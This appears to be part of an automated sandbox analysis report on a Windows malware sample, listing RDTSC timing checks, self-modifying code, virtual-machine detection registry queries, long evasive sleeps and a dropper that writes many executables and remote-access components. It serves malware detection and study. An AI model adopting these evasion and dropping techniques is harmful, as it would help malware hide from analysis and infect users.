                                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A50309 second address: 4A5036A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 mov edi, 0A01D40Eh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d je 00007F5ED317A99Bh 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F5E60CAC68Eh 0x0000001c and si, E358h 0x00000021 jmp 00007F5E60CAC68Bh 0x00000026 popfd 0x00000027 pushfd 0x00000028 jmp 00007F5E60CAC698h 0x0000002d add si, EDB8h 0x00000032 jmp 00007F5E60CAC68Bh 0x00000037 popfd 0x00000038 popad 0x00000039 rdtsc
                                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A5036A second address: 4A50382 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E60BA1664h 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A50382 second address: 4A50395 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [esi+44h] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e mov ebx, 4FE83C2Eh 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A50395 second address: 4A503E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F5E60BA1665h 0x0000000c and si, D9B6h 0x00000011 jmp 00007F5E60BA1661h 0x00000016 popfd 0x00000017 popad 0x00000018 or edx, dword ptr [ebp+0Ch] 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F5E60BA1668h 0x00000024 rdtsc
                                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A503E8 second address: 4A503EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A503EE second address: 4A503FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E60BA165Dh 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A503FF second address: 4A50436 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60CAC691h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test edx, 61000000h 0x00000011 jmp 00007F5E60CAC68Eh 0x00000016 jne 00007F5ED317A8E4h 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
                                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A50436 second address: 4A5043C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A5043C second address: 4A50442 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A50442 second address: 4A50446 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A50446 second address: 4A50478 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test byte ptr [esi+48h], 00000001h 0x0000000c pushad 0x0000000d mov ch, 16h 0x0000000f mov bl, 9Bh 0x00000011 popad 0x00000012 jne 00007F5ED317A8CFh 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F5E60CAC696h 0x00000021 rdtsc
                                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A50478 second address: 4A5047C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A5047C second address: 4A50482 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A50482 second address: 4A504A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60BA165Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test bl, 00000007h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov eax, edi 0x00000011 mov bx, 73CCh 0x00000015 popad 0x00000016 rdtsc
                                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A504A1 second address: 4A504A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A504A7 second address: 4A504AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A407B6 second address: 4A4088D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60CAC68Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F5E60CAC690h 0x00000011 sub eax, 1B598D88h 0x00000017 jmp 00007F5E60CAC68Bh 0x0000001c popfd 0x0000001d popad 0x0000001e push eax 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F5E60CAC68Fh 0x00000026 xor esi, 69ED11CEh 0x0000002c jmp 00007F5E60CAC699h 0x00000031 popfd 0x00000032 push eax 0x00000033 pushfd 0x00000034 jmp 00007F5E60CAC697h 0x00000039 sbb cx, 1FDEh 0x0000003e jmp 00007F5E60CAC699h 0x00000043 popfd 0x00000044 pop eax 0x00000045 popad 0x00000046 xchg eax, ebp 0x00000047 pushad 0x00000048 push edi 0x00000049 push ecx 0x0000004a pop ebx 0x0000004b pop eax 0x0000004c mov bl, 27h 0x0000004e popad 0x0000004f mov ebp, esp 0x00000051 pushad 0x00000052 mov ebx, ecx 0x00000054 jmp 00007F5E60CAC696h 0x00000059 popad 0x0000005a and esp, FFFFFFF8h 0x0000005d push eax 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 0x00000061 jmp 00007F5E60CAC68Ah 0x00000066 rdtsc
                                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A4088D second address: 4A40891 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A40891 second address: 4A40897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A40897 second address: 4A4089D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A4089D second address: 4A408A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A408A1 second address: 4A408AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A408AE second address: 4A408B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A408B4 second address: 4A408C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 mov ecx, 343E1929h 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A408C0 second address: 4A4098B instructions: 0x00000000 rdtsc 0x00000002 mov eax, 51F61EE5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F5E60CAC691h 0x00000011 pushfd 0x00000012 jmp 00007F5E60CAC690h 0x00000017 or eax, 44A62E28h 0x0000001d jmp 00007F5E60CAC68Bh 0x00000022 popfd 0x00000023 popad 0x00000024 xchg eax, ebx 0x00000025 jmp 00007F5E60CAC696h 0x0000002a xchg eax, esi 0x0000002b jmp 00007F5E60CAC690h 0x00000030 push eax 0x00000031 pushad 0x00000032 call 00007F5E60CAC691h 0x00000037 mov ebx, ecx 0x00000039 pop esi 0x0000003a push ebx 0x0000003b jmp 00007F5E60CAC698h 0x00000040 pop ecx 0x00000041 popad 0x00000042 xchg eax, esi 0x00000043 jmp 00007F5E60CAC691h 0x00000048 mov esi, dword ptr [ebp+08h] 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007F5E60CAC698h 0x00000054 rdtsc
                                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A4098B second address: 4A40991 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A40991 second address: 4A409F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60CAC68Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b jmp 00007F5E60CAC691h 0x00000010 test esi, esi 0x00000012 pushad 0x00000013 call 00007F5E60CAC68Ch 0x00000018 pushfd 0x00000019 jmp 00007F5E60CAC692h 0x0000001e add eax, 5FC5FF98h 0x00000024 jmp 00007F5E60CAC68Bh 0x00000029 popfd 0x0000002a pop esi 0x0000002b push eax 0x0000002c push edx 0x0000002d movsx ebx, ax 0x00000030 rdtsc
                                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A409F0 second address: 4A40A28 instructions: 0x00000000 rdtsc 0x00000002 call 00007F5E60BA1660h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b je 00007F5ED3076FDEh 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov ebx, eax 0x00000016 jmp 00007F5E60BA1666h 0x0000001b popad 0x0000001c rdtsc
                                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A40A28 second address: 4A40A73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60CAC68Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 jmp 00007F5E60CAC696h 0x00000015 mov ecx, esi 0x00000017 pushad 0x00000018 jmp 00007F5E60CAC68Eh 0x0000001d mov ch, 34h 0x0000001f popad 0x00000020 je 00007F5ED3181FC1h 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A40A73 second address: 4A40A77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 475913 instructions caused by: Self-modifying code
                                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 4A3E40 instructions caused by: Self-modifying code
                                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 2CEB46 instructions caused by: Self-modifying code
                                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 4894DE instructions caused by: Self-modifying code
                                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 50A74D instructions caused by: Self-modifying code
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 8A5913 instructions caused by: Self-modifying code
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 8D3E40 instructions caused by: Self-modifying code
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 6FEB46 instructions caused by: Self-modifying code
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 8B94DE instructions caused by: Self-modifying code
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 93A74D instructions caused by: Self-modifying code
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe Special instruction interceptor: First address: BFDE39 instructions caused by: Self-modifying code
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe Special instruction interceptor: First address: C8F426 instructions caused by: Self-modifying code
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04AC069B rdtsc 0_2_04AC069B
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1368
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1030
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1109
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 977
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1320
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6519
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7775
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5929
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 461
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4162
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1096
                                Source: C:\Users\Public\Netstat\FuturreApp.exe Window / User API: threadDelayed 8842
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3897
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 771
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1074
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exe Dropped PE file which has not been started: C:\Users\Public\Netstat\TCCTL32.DLL
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1017915001\712b285aaa.exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1017921001\85070a414c.exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1017906001\3b81e6737d.exe
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI51602\select.pyd
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[2].exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[2].exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1017920001\194df6b68b.exe
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI51602\_lzma.pyd
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[3].exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1017913001\97d4b1071f.exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[3].exe
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exe Dropped PE file which has not been started: C:\Users\Public\Netstat\remcmdstub.exe
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI51602\_ssl.pyd
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI51602\_sqlite3.pyd
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[4].exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1017903001\cb947ba4b8.exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[4].exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[4].exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1017907001\90ddd682ad.exe
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI51602\_decimal.pyd
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1017905001\4dd01d90fc.exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1017911001\67fbb282d1.exe
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI51602\_hashlib.pyd
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI51602\_queue.pyd
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[3].exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1017917001\7423465717.exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1017910001\fde98a8d0b.exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[3].exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[5].exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1017912001\f7b3852b06.exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1017904001\97bf9e137e.exe
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\l2sopuet\l2sopuet.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI51602\_socket.pyd
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI51602\_ctypes.pyd
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exe Dropped PE file which has not been started: C:\Users\Public\Netstat\HTCTL32.DLL
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[2].exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1017901001\a4439a2887.exe
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI51602\_bz2.pyd
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1017916001\UZAj8wc.exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[4].exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1017908001\2c36247645.exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\UZAj8wc[1].exe
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI51602\python310.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI51602\unicodedata.pyd
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1017914001\db75e03f4b.exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1017909001\f8645e1e85.exe
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe Check user administrative privileges: GetTokenInformation
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe API coverage: 5.9 %
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6172 Thread sleep time: -44022s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6580 Thread sleep count: 1368 > 30
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6580 Thread sleep time: -2737368s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6392 Thread sleep count: 1030 > 30
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6392 Thread sleep time: -2061030s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6508 Thread sleep count: 207 > 30
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6508 Thread sleep time: -6210000s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5968 Thread sleep count: 1109 > 30
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5968 Thread sleep time: -2219109s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6552 Thread sleep count: 977 > 30
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6552 Thread sleep time: -1954977s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6348 Thread sleep count: 1320 > 30
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6348 Thread sleep time: -2641320s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1888 Thread sleep count: 6519 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1888 Thread sleep count: 177 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6120 Thread sleep time: -6456360425798339s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6004 Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4052 Thread sleep count: 7775 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6436 Thread sleep count: 54 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3180 Thread sleep time: -3689348814741908s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5436 Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6628 Thread sleep count: 5929 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 180 Thread sleep time: -3689348814741908s >= -30000s
